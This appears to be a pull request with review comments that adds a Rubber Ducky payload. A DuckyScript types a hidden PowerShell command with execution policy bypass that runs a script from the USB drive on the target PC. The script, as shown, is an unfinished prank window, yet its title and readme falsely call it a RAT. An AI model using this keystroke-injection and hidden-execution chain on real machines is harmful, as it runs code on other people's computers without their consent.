New Payload - R.A.T #429

Open
wants to merge 2 commits into base: master
59 changes: 59 additions & 0 deletions payloads/library/execution/Win_PoSH_RAT/R.ps1
@@ -0,0 +1,59 @@
function Hide-ConsoleWindow() {
$ShowWindowAsyncCode = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);'
$ShowWindowAsync = Add-Type -MemberDefinition $ShowWindowAsyncCode -name Win32ShowWindowAsync -namespace Win32Functions -PassThru

$hwnd = (Get-Process -PID $pid).MainWindowHandle
if ($hwnd -ne [System.IntPtr]::Zero) {
# When you got HWND of the console window:
# (It would appear that Windows Console Host is the default terminal application)
$ShowWindowAsync::ShowWindowAsync($hwnd, 0)
} else {
# When you failed to get HWND of the console window:
# (It would appear that Windows Terminal is the default terminal application)

# Mark the current console window with a unique string.
$UniqueWindowTitle = New-Guid
$Host.UI.RawUI.WindowTitle = $UniqueWindowTitle
$StringBuilder = New-Object System.Text.StringBuilder 1024

# Search the process that has the window title generated above.
$TerminalProcess = (Get-Process | Where-Object { $_.MainWindowTitle -eq $UniqueWindowTitle })
# Get the window handle of the terminal process.
# Note that GetConsoleWindow() in Win32 API returns the HWND of
# powershell.exe itself rather than the terminal process.
# When you call ShowWindowAsync(HWND, 0) with the HWND from GetConsoleWindow(),
# the Windows Terminal window will be just minimized rather than hidden.
$hwnd = $TerminalProcess.MainWindowHandle
if ($hwnd -ne [System.IntPtr]::Zero) {
$ShowWindowAsync::ShowWindowAsync($hwnd, 0)
} else {
Write-Host "Failed to hide the console window."
}
}
}
Hide-ConsoleWindow;
[void] [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms");
Add-Type -Assembly PresentationFramework
$I = New-Object System.IO.MemoryStream(,[Convert]::FromBase64String(''))
Member
Please either provide the source or explain how this base64 is derived.

$O = New-Object System.IO.MemoryStream;
$Z = New-Object System.IO.Compression.GzipStream $I, ([IO.Compression.CompressionMode]::Decompress);
$Z.CopyTo($O);
$Z.Close();
$I.Close();
$GR = $true;
$S = [System.Windows.Forms.Screen]::PrimaryScreen;
$W = [Windows.Markup.XamlReader]::Load((New-Object System.Xml.XmlNodeReader([xml][System.Text.Encoding]::UTF8.GetString($O.ToArray()))));
$O.Close();
$R = $W.FindName("R");
$X = $W.FindName("U");
$X.Text = "$U`n$([char]64)$IP`n$([char]105+[char]115+[char]32+[char]97+[char]32+[char]82+[char]97+[char]116)";
$H = [Windows.Input.MouseButtonEventHandler]{$W.Close();$_.Handled=$true;}
$W.Add_MouseRightButtonDown($H);
$W.Left = $S.WorkingArea.Left;
$W.Top = $S.Bounds.Height - $W.Height;
$T = New-Object System.Windows.Forms.Timer;
$T.Interval = 100;
$T.add_Tick({if($GR){if(($W.Left+5)-lt($S.WorkingArea.Width-$W.Width)){$W.Left=($W.Left+5)}else{$R.ScaleX=-1;$script:GR=!$GR;$X.Margin = [System.Windows.Thickness]"100,0,0,0" }}else{if(($W.Left-5)-gt0){$W.Left=($W.Left-5)}else{$R.ScaleX=1;$script:GR=!$GR;$X.Margin = [System.Windows.Thickness]"0"}}});
$W.Add_Closing({$T.Stop();$T.Dispose();})
$T.Start();
$W.ShowDialog();
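Review bot: The decode chain that builds `$W` has nothing to decode: `[Convert]::FromBase64String('')` yields zero bytes, so the MemoryStream, GzipStream and `XamlReader::Load` calls can never produce a window and the script cannot run as submitted. Commit the XAML as a readable file next to R.ps1 and load it from there, which also answers the maintainer's request above; a library payload should not ship an opaque compressed blob. Smaller points in the same hunk: `$StringBuilder` in Hide-ConsoleWindow is allocated and never used; the `Write-Host "Failed to hide the console window."` branch prints to the very console that payload.txt launches with `-W h`, so nobody sees it; the text assigned to `$X.Text` is built from `[char]` codes (it spells "is a Rat"), which together with the one-letter names `$I`, `$O`, `$Z`, `$W`, `$R`, `$X` makes the script needlessly hard to audit, so use plain string literals and descriptive names; and the script assumes `$U` and `$IP` were set by the caller, which deserves a comment at the top of R.ps1.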
41 changes: 41 additions & 0 deletions payloads/library/execution/Win_PoSH_RAT/payload.txt
@@ -0,0 +1,41 @@
REM TITLE R.A.T
REM AUTHOR TRIBBIC
REM DESCRIPTION Set up a R.A.T on the target windows machine
REM DUCKY SCRIPT 3

REM USERNAME to login to the R.A.T
DEFINE #USERNAME name
REM Your IP Address use https://www.ipchicken.com/ to get your IP
DEFINE #IPADDRESS 192.168.1.1
ATTACKMODE HID STORAGE
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben

REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay

TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM

REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120

VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION

GUI r
DELAY 200
STRINGLN powershell -Noni -NoP -W h -EP Bypass $U='#USERNAME';$IP='#IPADDRESS'; iex((Get-Volume -FileSystemLabel 'DUCKY').DriveLetter+':\R.ps1')
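Review bot: `REM DESCRIPTION Set up a R.A.T on the target windows machine`, like the title above it, describes something R.ps1 does not do: the script builds a XAML window, sets its text to the configured name and IP followed by "is a Rat", moves it back and forth along the bottom of the screen on a 100 ms timer and closes it on right-click; there is no remote-access component. Reword the title and description to say what the user will actually see, so the library does not list a screen gag as a remote-access tool. Related: the comment on `DEFINE #IPADDRESS` sends users to ipchicken.com for their public IP, but the value is only displayed as text in the window, so say it is display-only (the 192.168.1.1 placeholder is fine for that). Also, `REM VERSION 1.1` and `REM AUTHOR: Korben` sit directly after ATTACKMODE and read as the payload's own version and author, conflicting with `Version: 1.0` and `Author: TRIBBIC` in readme.md; a comment noting that they belong to the DETECT_READY extension would avoid the confusion.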
Member
I would suggest using a DEFINE for those who may not be using the default drive label of "DUCKY".

You would do this by adding to the top of the payload:
DEFINE #DUCKY_DRIVE_LABEL DUCKY
and then update references to the drive label to be something like (in the case of this line):
STRINGLN powershell -Noni -NoP -W h -EP Bypass $U='#USERNAME';$IP='#IPADDRESS'; iex((Get-Volume -FileSystemLabel '#DUCKY_DRIVE_LABEL').DriveLetter+':\R.ps1')

22 changes: 22 additions & 0 deletions payloads/library/execution/Win_PoSH_RAT/readme.md
@@ -0,0 +1,22 @@
# RAT
- Author: TRIBBIC
- Version: 1.0
- Target: Windows 10 (Powershell 5.1+)
- Category: Execution
- Attackmode: HID & Storage
- Ducky Script Version: 3

## Setup
In the payload.txt change the two DEFINE's

\#USERNAME Should be your login name

\#IPADDRESS Should be your IP Address

## Description
Create a R.A.T using Windows Powershell on Targets PC

## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
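Review bot: `Create a R.A.T using Windows Powershell on Targets PC` under Description does not match R.ps1, which only displays a window moving along the bottom of the screen with the configured name, IP and the words "is a Rat"; describe that, and say how it is dismissed (right-click on the window), so a user knows what to expect. Setup should also state that the payload runs `R.ps1` from the root of the storage volume labelled `DUCKY` (see `Get-Volume -FileSystemLabel 'DUCKY'` in payload.txt), since the readme never mentions that the file must be on the drive, and that `#IPADDRESS` is only shown on screen rather than connected to. Minor: `\#USERNAME` and `\#IPADDRESS` render as plain `#USERNAME` / `#IPADDRESS`; backticks would read better than backslash escapes.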